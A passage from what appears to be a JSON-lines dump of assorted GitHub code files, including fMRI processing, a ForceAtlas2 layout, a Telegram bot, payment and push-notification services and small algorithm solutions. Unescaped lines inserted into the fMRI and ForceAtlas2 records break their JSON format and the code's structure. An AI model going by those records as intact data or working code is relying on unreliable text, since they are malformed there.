Dt,roivals,roisizes,tr_input,vol_info,input_extension = load_input(inputfile)\n if vol_info is not None and not outputvolumeformat in [\"same\",\"auto\"]:\n vol_info[\"extension\"]=outputvolumeformat\n \n Dt_gsr,roivals,roisizes,tr_input,vol_info,input_extension = load_input(inputgsr_list[inputidx])\n \n Dt=Dt-Dt_gsr\n \n print(\"Loaded input file: %s (%dx%d)\" % (inputfile,Dt.shape[0],Dt.shape[1]))\n if tr_input:\n tr=tr_input\n\n mask=None\n if len(maskfile_list)==num_inputs:\n maskfile=maskfile_list[inputidx]\n mask,_,_,_,mask_vol_info,_ = load_input(maskfile)\n masksize=list(mask.shape[:2])+[1]\n print(\"Loaded mask file: %s (%s)\" % (maskfile,\"x\".join([str(x) for x in masksize[:2]])))\n \n if mask_vol_info is not None and vol_info is not None:\n #map mask to full voxel space (and intersectc with input data mask)\n mask_full=np.zeros(mask_vol_info['mask'].shape)\n mask_full[mask_vol_info['mask']]=mask\n mask_full=(mask_full*vol_info['mask'])>0\n \n #then map mask from full voxel space to masked data space\n mask=mask_full[vol_info['mask']>0]\n \n vol_info['mask']=mask_full\n Dt=Dt[:,mask]\n else:\n mask=None\n \n numvols=Dt.shape[0]\n \n outliermat=np.zeros((numvols,1))\n if confounds_dict[\"outliermat\"] is not None:\n outliermat=confounds_dict[\"outliermat\"]\n \n outlierflat=np.sum(vec2columns(outliermat)!=0,axis=1)[:,None]\n outlierflat[:skipvols,:]=True\n outlierflat=outlierflat[:,0]\n \n numvols_not_outliers=np.sum(np.abs(outlierflat)==0,axis=0)\n print(\"Non-outlier volumes: \", numvols_not_outliers)\n \n print(\"Masked data size after outlier exclusion: (%dx%d)\" % (Dt.shape[0],Dt.shape[1]))\n \n Dt_rms=np.sqrt(np.mean(Dt[outlierflat==0,:]**2,axis=0))\n \n if do_concat:\n Dt_concat+=[Dt_rms]\n \n if len(outbase_list)==num_inputs:\n savedfilename, shapestring = save_timeseries(outbase_list[inputidx]+\"\", input_extension, {\"ts\":Dt_rms,\"roi_labels\":roivals,\"roi_sizes\":roisizes,\"repetition_time\":tr}, vol_info)\n print(\"Saved %s (%s)\" % (savedfilename,shapestring))\n \n if do_concat and len(Dt_concat)>1:\n Dt_concat=np.mean(np.vstack(Dt_concat),axis=0)\n savedfilename, shapestring = save_timeseries(outbase_list[0]+\"\", input_extension, {\"ts\":Dt_concat,\"roi_labels\":roivals,\"roi_sizes\":roisizes,\"repetition_time\":tr}, vol_info)\n print(\"Saved %s (%s)\" % (savedfilename,shapestring))\nif __name__ == \"__main__\":\n 
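# (run_rmsglobal, defined above, reduces each GSR-removed voxel time series
# to a single root-mean-square value over the non-outlier volumes:
#     rms[v] = sqrt( mean_t D[t, v]**2 ),  t restricted to outlierflat == 0,
# which is the np.sqrt(np.mean(Dt[outlierflat==0,:]**2,axis=0)) step above.)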
run_rmsglobal(sys.argv[1:])\n","repo_name":"kjamison/fmriclean","sub_path":"fmri_rmsglobal.py","file_name":"fmri_rmsglobal.py","file_ext":"py","file_size_in_byte":6759,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"38794743342","text":"import numpy as np\nimport networkx as nx\n\nfrom .node import NodeCollection, Node\n\n# from .utils import *\nfrom .region import RootRegion\nfrom .energy_function import attraction, repulsion, gravity,adjust_speed\nimport random\nfrom typing import Optional\n\n\n\n\n\n\nclass ForceAtlas2(object):\n \"\"\"\n Main class that runs the ForceAtlas2 algorithm\n \"\"\"\n def __init__(\n self,\n graph: nx.Graph,\n edge_weight_influence: float = 1,\n scaling_ratio: float = 2.0,\n gravity: float = 1.0,\n speed: float = 1.0,\n speed_efficiency: float = 1.0,\n jitter_tolerance: float = 1.0,\n max_force:Optional[float] = None,\n quadtree_maxsize:int = 1000,\n dissuade_hubs: bool = False,\n prevent_overlap: bool = True,\n barnes_hut_optimize: bool = False,\n barnes_hut_theta: float = 1.2,\n lin_log_mode: bool = False,\n normalize_edge_weights: bool = False,\n strong_gravity_mode: bool = False,\n positions={},\n sizes={},\n ):\n\n \"\"\"\n\n Parameters\n ----------\n graph : nx.Graph\n input graph\n edge_weight_influence : int\n influence of edges' weight in the spatialisation\n scaling_ratio : float\n force coefficient\n gravity : float\n gravity\n speed : float\n coefficient applied to nodes' movement vector each iteration\n max_force : float|int\n maximum magnitude of a movement vector\n quadtree_maxsize : int\n maximum number of nodes in the quadtree used when `barnes_hut_optimize = True`\n outbound_attraction_distribution: bool\n use a node mass (=degree) in the attraction computation\n prevent_overlap : bool\n prevent node overlapping (use node size)\n barnes_hut_optimize : bool\n enable fast computation of ForceAtlas2 by subdividing the graph into a Quadtree. Each node's new position is\n computed based on nodes in the Quadtree where it is.\n barnes_hut_theta : float\n constant (by default set to 1.2)\n lin_log_mode : bool\n multiply the attraction force by the logarithm of the distance\n normalize_edge_weights : bool\n if True, normalize edge weights. Formula w = (w-min)/(max-min)\n strong_gravity_mode : bool\n enable strong gravity mode\n positions : dict\n dictionary containing initial positions for the graph's nodes. 
Initialized with random values if empty\n sizes : dict\n dictionary that contains each node's size (by default, degree of each node)\n \"\"\"\n self.root_region = None\n self.strong_gravity_mode = strong_gravity_mode\n self.normalize_edge_weights = normalize_edge_weights\n self.lin_log_mode = lin_log_mode\n self.barnes_hut_theta = barnes_hut_theta\n self.barnes_hut_optimize = barnes_hut_optimize\n self.prevent_overlap = prevent_overlap\n self.dissuade_hubs = dissuade_hubs\n self.speed = speed\n self.gravity = gravity\n self.scaling_ratio = scaling_ratio\n self.edge_weight_influence = edge_weight_influence\n self.max_force = max_force\n self.quadtree_maxsize = quadtree_maxsize\n self.speed_efficiency = speed_efficiency\n self.jitter_tolerance = jitter_tolerance\n\n\n self.graph = graph\n\n \n\n # if no weight associated to an edge, set its value to min\n min_weight = np.inf\n edges_weights = list(nx.get_edge_attributes(self.graph, \"weight\").values())\n if len(edges_weights) == 0:\n min_weight = 1\n else:\n min_weight = np.min(edges_weights)\n\n for src, tar, attr in self.graph.edges(data=True):\n if not \"weight\" in attr:\n self.graph.edges[src, tar][\"weight\"] = min_weight\n\n # Initialize node attributes\n self.nodes_attributes = NodeCollection()\n\n \n for node in self.graph:\n param = {\n \"id\": node,\n \"dx\": 0,\n \"dy\": 0,\n \"mass\": 1+self.graph.degree(node),\n \"x\": random.random()*1000 if not node in positions else positions[node][0],\n \"y\": random.random()*1000 if not node in positions else positions[node][1],\n \"size\": self.graph.degree(node) if not node in sizes else sizes[node],\n }\n self.nodes_attributes + Node(**param)\n \n self.root_region: RootRegion = None\n\n # if normalization activated, we pre-compute edge weights' minimum and maximum\n if self.normalize_edge_weights:\n edges_weights = list(nx.get_edge_attributes(self.graph, \"weight\").values())\n self.weight_min = np.min(edges_weights)\n self.weight_max = np.max(edges_weights)\n \n\n\n def get_positions(self):\n \"\"\"\n Return computed positions of the graph's node using\n the ForceAtlas2 algorithm\n\n Returns\n -------\n dict\n dict with key corresponding to node id and the value corresponding\n to its positions in a 2D space\n \"\"\"\n positions = {}\n for n in self.graph:\n positions[n] = [self.nodes_attributes[n].x, self.nodes_attributes[n].y]\n return positions\n\n def iteration(self):\n \"\"\"\n Update the positions of the nodes by applying the Force2Atlas algorithm.\n In order to exploit the potential of the ForceAtlas2 algorithm, it's common to run the algorithm \n multiple times \n \"\"\"\n\n # Update nodes attributes by storing previous state information and reinitialize\n # node mass\n for node in self.graph:\n self.nodes_attributes[node].mass = 1+self.graph.degree(node)\n self.nodes_attributes[node].old_dx = self.nodes_attributes[node].dx\n self.nodes_attributes[node].old_dy = self.nodes_attributes[node].dy\n\n self.nodes_attributes[node].dx = 0\n self.nodes_attributes[node].dy = 0\n\n # If Barnes Hut active, initialize root region\n if self.barnes_hut_optimize:\n # limit the quadtree size for performance issue\n RootRegion.REGION_LEFT = self.quadtree_maxsize\n self.root_region = RootRegion(\n list(self.graph.nodes()), self.nodes_attributes\n )\n self.root_region.build_sub_region()\n\n # If outbound_attraction_distribution active, compensate\n outbound_compensation = 0\n if self.dissuade_hubs:\n for n in self.graph:\n outbound_compensation += self.nodes_attributes[n].mass\n\n 
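# (After averaging the compensation on the next line, iteration() applies
# repulsion, gravity, and attraction; lin_log_mode, described in the
# constructor docstring above, swaps the linear attraction for a logarithmic
# one. A standalone sketch of the two force magnitudes from the ForceAtlas2
# formulation -- an illustrative helper, not this module's energy_function API:)
import math

def attraction_magnitude(distance, weight=1.0, lin_log=False):
    # linear: F = w * d ; lin-log: F = w * log(1 + d)
    return weight * math.log(1 + distance) if lin_log else weight * distance

assert attraction_magnitude(0.0, lin_log=True) == 0.0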
outbound_compensation /= len(self.graph)\n\n\n # Apply Repulsion\n if self.barnes_hut_optimize:\n from joblib import Parallel,delayed\n Parallel(n_jobs=8,backend=\"threading\")(delayed(self.root_region.apply_force)(n, self.barnes_hut_theta, self.scaling_ratio, self.prevent_overlap) for n in self.graph)\n # for n in self.graph:\n # self.root_region.apply_force(\n # n, self.barnes_hut_theta, self.scaling_ratio, self.prevent_overlap\n # )\n else:\n for n1 in self.graph:\n nu = self.nodes_attributes[n1]\n for n2 in self.graph:\n nv = self.nodes_attributes[n2]\n if n1 == n2:\n continue\n factor = repulsion(\n nu,\n nv,\n self.scaling_ratio,\n prevent_overlap=self.prevent_overlap,\n )\n self.nodes_attributes.apply(n1, n2, factor)\n\n # Apply Gravity\n for n in self.graph:\n factor = gravity(self.nodes_attributes[n], gravity=self.gravity/self.scaling_ratio,scaling_ratio=self.scaling_ratio,strong_gravity=self.strong_gravity_mode)\n self.nodes_attributes.apply_g(n, factor)\n \n for src, tar, attr in self.graph.edges(data=True): # type: ignore\n w = 1\n if self.edge_weight_influence > 0:\n w = attr[\"weight\"] ** self.edge_weight_influence\n if self.normalize_edge_weights:\n w = (w - self.weight_min) / (self.weight_max - self.weight_min)\n\n factor = attraction(\n self.nodes_attributes[src],\n self.nodes_attributes[tar],\n outbound_compensation if self.dissuade_hubs else 1,\n lin_log=self.lin_log_mode,\n prevent_overlap=self.prevent_overlap,\n weight=w,distributed=self.dissuade_hubs\n )\n self.nodes_attributes.apply(src, tar, factor)\n\n \n # Adjust speed and apply changes to nodes' position \n self.speed = adjust_speed(self.speed,self.nodes_attributes,self.jitter_tolerance,self.speed_efficiency)\n for n in self.graph:\n node_speed=self.speed\n ni = self.nodes_attributes[n]\n \n force = np.sqrt(ni.dx**2 + ni.dy**2)\n if self.max_force and force > self.max_force :\n self.nodes_attributes[n].dx = (self.nodes_attributes[n].dx*self.max_force)/force\n self.nodes_attributes[n].dy = (self.nodes_attributes[n].dy*self.max_force)/force\n\n\n swinging = ni.mass* np.sqrt((ni.old_dx - ni.dx) **2 + (ni.old_dy - ni.dy)**2)\n \n if self.prevent_overlap:\n node_speed = 0.1 * self.speed / (1.0 + np.sqrt(self.speed *swinging))\n df = np.sqrt(ni.dx**2 + ni.dy**2)\n node_speed = min(node_speed*df,10.)/df\n else:\n node_speed= self.speed/(1+np.sqrt(self.speed*swinging))\n\n\n self.nodes_attributes[n].x = (\n self.nodes_attributes[n].x + self.nodes_attributes[n].dx * node_speed \n )\n self.nodes_attributes[n].y = (\n self.nodes_attributes[n].y + self.nodes_attributes[n].dy * node_speed \n )","repo_name":"Jacobe2169/forceatlas2","sub_path":"force_atlas_layout/force_atlas2.py","file_name":"force_atlas2.py","file_ext":"py","file_size_in_byte":10167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26545209827","text":"from collections import deque\n\n\ndef solution(numbers, target):\n que = deque([0])\n for number in numbers:\n sub_que = deque()\n for b in que:\n sub_que.append(b+number)\n sub_que.append(b-number)\n que = sub_que\n return que.count(target)\n\n\nprint(solution([1, 1, 1, 1, 1], 3) == 5)\nprint(solution([4, 1, 2, 1], 4) == 2)\n","repo_name":"do-park/algorithm-2022","sub_path":"programmers/타겟_넘버.py","file_name":"타겟_넘버.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2893683415","text":"import subprocess\nimport os\n\n\ndef 
build_executable(script_path, one_file=True, no_console=False, additional_paths=None, exe_name=None):\n \"\"\"\n Build a single executable from a Python script using PyInstaller.\n\n Args:\n - script_path (str): Path to the Python script to be converted.\n - one_file (bool): Whether to bundle everything into a single executable.\n - no_console (bool): Whether to suppress the console window for GUI applications.\n - additional_paths (list): List of additional paths to include.\n \"\"\"\n pyinstaller_path = \"pyinstaller\"\n\n # Generate initial spec file\n spec_args = [pyinstaller_path, \"--onefile\" if one_file else \"--onedir\", script_path]\n\n if no_console:\n spec_args.append(\"--noconsole\")\n if exe_name:\n spec_args.extend([\"--name\", exe_name])\n subprocess.run(spec_args)\n\n\n\n # Modify spec file to include additional paths\n spec_file = os.path.splitext(os.path.basename(script_path))[0] + \".spec\"\n if additional_paths:\n with open(spec_file, \"r\") as file:\n content = file.readlines()\n\n with open(spec_file, \"w\") as file:\n for line in content:\n if line.strip().startswith(\"pathex=\"):\n # Add additional paths to the pathex list\n paths = \", \".join([f\"'{path}'\" for path in additional_paths])\n line = f\" pathex=[{paths}],\\n\"\n file.write(line)\n\n # Build executable using modified spec file\n build_args = [pyinstaller_path, spec_file]\n print(f\"Running command: {' '.join(build_args)}\") # Print the command\n subprocess.run(build_args)\n\n\nif __name__ == \"__main__\":\n # Example usage\n script_to_convert = \"main.py\"\n additional_paths = [r'C:\\\\Users\\\\Admin\\\\PycharmProjects\\\\VisualSimulation\\\\my_modules']\n build_executable(script_to_convert,\n one_file=True,\n no_console=False,\n additional_paths=additional_paths,\n exe_name=\"Particle_Simulator\")\n","repo_name":"giedrius2020/ParticleSimulator","sub_path":"build_exe.py","file_name":"build_exe.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29282483884","text":"# Compatible with ranger 1.6.*\n#\n# Filter with smart-case-intivity. If filter is all lowercase\n# it performs a insensitive search. 
Otherwise it applies case-sensitivity.\n#\n\n# Save the original filter function\nimport ranger.container.directory\n_accept_file = ranger.container.directory.accept_file\n\n# Define a new one\ndef custom_accept_file(fname, directory, hidden_filter, name_filter):\n\n if not name_filter:\n return _accept_file(fname, directory, hidden_filter, name_filter)\n\n # all lower case is processed as case-insensitive search\n nfilter = name_filter.pattern\n if nfilter.islower():\n fname = fname.lower()\n\n # Only process filtered input\n if nfilter in fname:\n return True\n\n return False\n\n\n# Overwrite the old function\nimport ranger.container.directory\nranger.container.directory.accept_file = custom_accept_file\n","repo_name":"desyncr/rangr","sub_path":"plugins/plugin_file_filter.py","file_name":"plugin_file_filter.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15925859171","text":"import traceback\nimport lorem\nimport re\nfrom random import randint\n\nfrom telegram import Message, MessageEntity\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, BaseFilter, Filters\nfrom cstream import stdwar, stderr, stdout\n\nfrom botele import Botele\n\n\nclass GremioEciBot(Botele):\n \"\"\"\"\"\"\n\n @Botele.command(\"start\", \"Inicializa um chat com o bot\")\n def _start(self, info: dict):\n stdout[2] << f\"> /start from @{info['username']}\"\n params = {\n \"chat_id\": info[\"chat_id\"],\n \"text\": \"Olá, eu sou o bot do Grêmio ECI/UFRJ.\",\n }\n return info[\"bot\"].send_message(**params)\n\n @Botele.command(\"lorem\", \"Gera um parágrafo Lorem Ipsum\")\n def lorem(self, info: dict):\n stdout[2] << f\"> /lorem from @{info['username']}\"\n params = {\n \"chat_id\": info[\"chat_id\"],\n \"text\": lorem.paragraph(),\n }\n return info[\"bot\"].send_message(**params)\n\n @Botele.command(\"comandos\", \"Lista os comandos disponíveis\")\n def comandos(self, info: dict):\n stdout[2] << f\"> /comandos from @{info['username']}\"\n params = {\n \"chat_id\": info[\"chat_id\"],\n \"text\": \"\\n\".join([f\"/{cmd}\" for cmd, des in self.command_list]),\n }\n return info[\"bot\"].send_message(**params)\n\n @Botele.command(\"lista\")\n def _lista(self, info):\n stdout[2] << f\"> /lista from @{info['username']}\"\n params = {\n \"chat_id\": info[\"chat_id\"],\n \"text\": self.list_commands(),\n }\n return info[\"bot\"].send_message(**params)\n\n @Botele.message(Filters.command)\n def unknown(self, info: dict):\n stdout[2] << f\"> Unknown command '{info['text']}' from @{info['username']}\"\n params = {\n \"chat_id\": info[\"chat_id\"],\n \"text\": f\"Comando inválido: `{info['text']}`\",\n \"parse_mode\": self.MARKDOWN,\n }\n return info[\"bot\"].send_message(**params)\n\n @Botele.error\n def error(self, info: dict):\n for line in traceback.format_tb(info[\"error\"].__traceback__):\n stderr[0] << line\n stderr[0] << info[\"error\"]\n","repo_name":"pedromxavier/botele","sub_path":"archive/gremioecibot/gremioecibot.py","file_name":"gremioecibot.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"126902569","text":"# -*- coding: utf-8 -*-\n\nimport mock\nimport random\nfrom nose_parameterized import parameterized\nfrom mpfs.core.wake_up.operations import WakeUpOperation\nfrom test.parallelly.json_api.base import CommonJsonApiTestCase\nfrom test.helpers.operation import PendingOperationDisabler\nfrom 
test.helpers.stubs.services import PushServicesStub\nfrom test.parallelly.api.disk.base import DiskApiTestCase\nfrom mpfs.common.util import to_json, from_json\nfrom mpfs.common.static import codes\n\n\nclass WakeUpTestCase(CommonJsonApiTestCase, DiskApiTestCase):\n device_id = 'DFBDE026-32ED-4S5A-9H9F-D1R497E64006'\n\n def test_wake_up_push_start(self):\n self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id})\n\n def test_wake_up_push_job_type(self):\n with mock.patch('mpfs.core.queue.mpfs_queue.put') as mocked_queue_put:\n self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id})\n args, kwargs = mocked_queue_put.call_args_list[0]\n assert args[1] == 'operation_service'\n\n def test_wake_up_push_start_with_missing_subscription(self):\n wrong_device_id = 'DFBDE026-32ED-4S5A-9H9F-D1R497E640061234'\n self.json_error('wake_up_push_start', {'uid': self.uid, 'device_id': wrong_device_id},\n code=codes.DEVICE_SUBSCRIPTION_NOT_FOUND)\n\n def test_wake_up_push_start_with_uninitialized_uid(self):\n self.json_error('wake_up_push_start', {'uid': 1234, 'device_id': self.device_id}, code=codes.WH_USER_NEED_INIT)\n\n def test_second_wake_up_push_start_request(self):\n with PendingOperationDisabler(WakeUpOperation):\n oid1 = self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id})['oid']\n oid2 = self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id})['oid']\n self.assertEqual(oid1, oid2)\n\n def test_wake_up_push_start_interval(self):\n self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id, 'interval': 20})\n\n @parameterized.expand([(20, 20),\n (7, 15),\n (-14, 15),\n (120, 120)])\n def test_wake_up_interval(self, interval, result_interval):\n with mock.patch('mpfs.core.operations.base.Operation.reenque') as mock_obj:\n resp = self.json_ok('wake_up_push_start', {'uid': self.uid,\n 'device_id': self.device_id,\n 'interval': interval})\n assert resp\n for call in mock_obj.call_args_list:\n assert call[0][0] == result_interval\n\n def test_wake_up_push_stop(self):\n session_id = self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id})['session_id']\n resp = self.client.get('disk/operations', uid=self.uid)\n self.assertEqual(len(from_json(resp.result)['items']), 1)\n self.json_ok('wake_up_push_stop', {'session_id': session_id})\n resp = self.client.get('disk/operations', uid=self.uid)\n self.assertEqual(len(from_json(resp.result)['items']), 0)\n\n @parameterized.expand([('wakeUpPushSessionId', codes.BAD_REQUEST_ERROR),\n ('wakeUpPush:SessionId', codes.BAD_REQUEST_ERROR),\n ('123:1234', codes.BAD_REQUEST_ERROR),\n ('123:1234:1234', codes.BAD_REQUEST_ERROR),\n (':89519942f316497b2e1453f5237644b1f1c5731fb2fd669d1b08c61e8f97c041', codes.PATH_ERROR),\n ('128280859:', codes.PATH_ERROR),\n ])\n def test_wake_up_push_stop_with_invalid_session_id(self, session_id, code):\n self.json_error('wake_up_push_stop', {'session_id': session_id}, code)\n\n def test_wake_up_push_stop_with_missing_operation(self):\n oid = self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id})['oid']\n random_oid = ''.join(random.sample(oid, len(oid)))\n session_id = '%s:%s' % (self.uid, random_oid)\n self.json_error('wake_up_push_stop', {'session_id': session_id}, code=codes.OPERATION_NOT_FOUND)\n\n def test_wake_up_push_batch_send(self):\n with PushServicesStub() as push_stub:\n with PendingOperationDisabler(WakeUpOperation):\n result = 
self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id})\n oid = result['oid']\n uid = self.uid\n PendingOperationDisabler.process(uid, oid)\n assert push_stub.batch_send.called\n args, _ = push_stub.batch_send.call_args_list[-1]\n batch_send_opts_recipients = [{self.uid: u'mob:f20e1c0cd36ea31432e66d880b20b16c'}]\n batch_send_opts_event = 'wake_up'\n batch_send_opts_data = to_json({'root': {'session_id': '{}:{}'.format(uid, oid), 'tag': 'wake_up'}})\n self.assertEqual(args[0], batch_send_opts_recipients)\n self.assertEqual(args[1], batch_send_opts_event)\n self.assertEqual(args[2], batch_send_opts_data)\n\n def test_wake_up_push_subscriptions_list(self):\n with PushServicesStub() as push_stub:\n with PendingOperationDisabler(WakeUpOperation):\n result = self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id})\n oid = result['oid']\n uid = self.uid\n PendingOperationDisabler.process(uid, oid)\n assert push_stub.subscriptions_list.called\n args, _ = push_stub.subscriptions_list.call_args_list[-1]\n self.assertEqual(args[0], self.uid)\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"disk/test/parallelly/wake_up_suite.py","file_name":"wake_up_suite.py","file_ext":"py","file_size_in_byte":5792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70857861994","text":"# Conduction the first experiment\n# parameters: \n# -s or --srs - a source of the data, file path.\n# -m or --src_m - a source of the ML model description, file path. gesture_classification/stages/models/*\n# -d or --dst - output dir of the model (dir path), output name will be formed automatically:\n# .json - accuracy data, \n# .pkl - dictionary of { y_test: ... , preds: ...}, \n# .jpg - confusion matrix\n\n\nimport argparse\nimport os\nimport sys\nimport copy\nimport numpy as np\nimport pathlib\nimport json \nimport pickle\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import accuracy_score\n\n# you need to install your abs path the the parent folder of modules\nsys.path.append('/home/s.gostilovich/gesture_progect/gesture_classification')\nfrom modules.models_module import create_model\nfrom modules.bullets import get_classes_dict, load_data, load_json, save_json, save_pickle, decorator_script_wrap\nfrom modules.ml_auxiliary import plot_confusion_matrix\n\n \n@decorator_script_wrap \ndef work_with_model_v2(src, m_src, dst, classes='def'):\n if classes == 'def':\n classes = get_classes_dict()\n \n data = load_data(src)\n data_tensor, data_tensor_test, y_train, y_test = data['x_train'], data['x_test'], data['y_train'], data['y_test']\n \n init_model_dict = load_json(m_src)\n \n \n model_filename = pathlib.Path(m_src).stem\n data_filename = pathlib.Path(src).stem\n ext_result = '.json'\n ext_preds = '.pkl'\n ext_fig = '.jpg'\n dst_main = os.path.join(dst, model_filename+ '-' + data_filename)\n \n \n model = create_model(init_model_dict)\n \n print(model.name + ':')\n print(model.main_dict)\n print()\n \n # train\n model.fit(data_tensor, y_train)\n fitting_time = model.fit_time\n #test\n preds = model.predict(data_tensor_test)\n print('Test acc = ', accuracy_score(y_test, preds))\n save_pickle({'preds': preds, 'y_test': y_test}, dst_main + ext_preds)\n plot_confusion_matrix(data['y_test'], preds, classes)\n plt.savefig(dst_main + ext_fig, dpi=300)\n print()\n # inferance\n inf_time = model.eval_inference_time(data_tensor_test[0:1], 100)\n print()\n # acc\n accs = model.eval_model(data_tensor, y_train, 
data_tensor_test, y_test)\n print(accs)\n out_dict = {'model': str(model),'accs': list(accs), 'inf_time': inf_time, 'mean_acc': accs.mean(), 'std_acc': accs.std(ddof=1),\n 'fitting_time': fitting_time}\n \n save_json(out_dict, dst_main + ext_result)\n \n return out_dict\n \n \n \ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-s', '--src', default=None)\n parser.add_argument('-m', '--m_src', default=None)\n \n parser.add_argument('-d', '--dst', default=None)\n # parser.add_argument('-r', '--rank', default=None,\n # help=\"For example rank='[1,2]' or rank = '1', default: None\")\n \n arg = parser.parse_args()\n \n dst = pathlib.Path(arg.dst)\n assert dst.is_dir(), f'Error! {dst} should be dirrectory'\n \n script_name = pathlib.Path(__file__).name\n \n print(f\"Start {script_name}:\")\n # script function\n work_with_model_v2(src=arg.src,m_src=arg.m_src, dst=arg.dst)\n ###\n print(f\"Finished script: {script_name}\")\n print()\n \n\nif __name__ == '__main__': \n main() ","repo_name":"GostSergei/gesture_classification","sub_path":"bullets/model_work_2.py","file_name":"model_work_2.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22458631591","text":"\"\"\"\nCreated on Thu Dec 31 04:25:24 2020\n\n@author: Jen\n\"\"\"\n\nimport cv2 as cv\nimport torchvision\n\nclass DFDC(torchvision.datasets.ImageFolder):\n def __init__(self, root, transform):\n super(DFDC, self).__init__(root, transform)\n\n def __getitem__(self, index):\n # override ImageFolder's method\n path, target = self.samples[index]\n img = cv.imread(path)\n img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n \n if self.transform is not None:\n sample = self.transform(image=img)['image']\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return sample, target\n\n\n","repo_name":"aides9/deepfake_video_detection","sub_path":"Dataset/DFDC.py","file_name":"DFDC.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70633575913","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 27 23:55:13 2020\n\n@author: jorgeagr\n\"\"\"\n\nimport numpy as np\n\nclass Jacobian_LSF(object):\n \n def __init__(self, G, d, f, df):\n self.N = G.shape[1]\n self.G = G\n self.d = d\n self.f = f\n self.df = df\n return\n \n def fit(self, m_0, max_iter=10):\n ''' \n Outputs:\n m : (N+1)-array\n model weights\n m_var : (N+1)*(N+1) matrix\n covariance matrix\n '''\n d = self.d.reshape((len(self.G), 1))\n self.m = m_0\n for i in range(max_iter):\n d_i = d - self.f(self.G, self.m)\n J = self.df(self.G, self.m)\n JTJinv = np.linalg.inv(J.T @ J)\n self.m = self.m + (JTJinv @ J.T) @ d_i\n self.norm = d_i.T @ d_i\n \n d_model = self.f(self.G, self.m)\n self.m = self.m.flatten()\n r = d - d_model\n self.data_var = (r**2).sum() / (J.shape[0] - J.shape[1])\n \n self.m_cov = JTJinv * self.data_var\n self.m_std = np.sqrt(self.m_cov.diagonal())\n \n return self.m, self.m_cov\n\nG = np.array([[-6], [-2], [2]])\nd = np.array([1.6, 3, 3])\n\n# m[0] == s^2\n# m[1] == A\nf = lambda G, m: m[1] * np.exp(-G**2/(2*m[0]))\ndef df(G, m):\n J = np.zeros((len(G), len(m)))\n J[:,0] = (- G / m[0] * m[1] * np.exp(-G**2/(2*m[0]))).flatten()\n J[:,1] = (np.exp(-G**2/(2*m[0]))).flatten()\n return J\n\nmodel = Jacobian_LSF(G, d, f, df)\nm, cov = model.fit(np.array([[15], [1.5]]), 200)\n\nprint('Jacobian 
Fit')\nprint('s^2 = {:.4f}'.format(m[0]))\nprint('A = {:.4f}'.format(m[1]))","repo_name":"JorgeAGR/nmsu-course-work","sub_path":"GPHY560/Homework 6/prob5.py","file_name":"prob5.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12117803708","text":"import json\n\nfrom flask_cors import CORS\nfrom flask import Flask, request\nimport gateway as gateway\n\napp = Flask(__name__)\n\nCORS(app)\n\n\n@app.route('/pay/')\ndef hello_world():\n return 'Hello World!'\n\n\n@app.route('/pay/client_token/', methods=['GET'])\ndef new_checkout():\n # app.logger.info('new_checkout(%s)' % customer_id)\n return str(gateway.generate_client_token())\n\n\n@app.route('/pay/purchase/', methods=['POST'])\ndef create_subscription():\n data = json.loads(request.data)\n app.logger.warning('create_checkout(%s)', data)\n result = gateway.subscription(data, app.logger.warning)\n app.logger.warning('create_checkout() return: %s' % result)\n\n try:\n return result.subscription.id\n except:\n return str(result), 500\n\n\nif __name__ == '__main__':\n app.run(\"0.0.0.0\", port=7000)\n","repo_name":"Gott50/pay-manager","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15123803209","text":"# def makelist(n, m):\r\n# \treturn [[0 for i in range(m)] for j in range(n)]\r\n\r\nN = int(input())\r\na = [0] + list(map(int, input().split()))\r\n\r\ndef check(n):\r\n\tb = [False]*(len(a))\r\n\tfor i in range(1, len(a)):\r\n\t\tif a[i] >= n:\r\n\t\t\tb[i] = True\r\n\t\telse:\r\n\t\t\tb[i] = False\r\n\r\n\tr = int(1e9)\r\n\tl = int(1e9)\r\n\trb = b[N]\r\n\tlb = b[N]\r\n\tfor i in range(1, N):\r\n\t\tif lb == b[N-i]:\r\n\t\t\tl = i\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tlb = b[N-i]\r\n\t\t\r\n\tfor 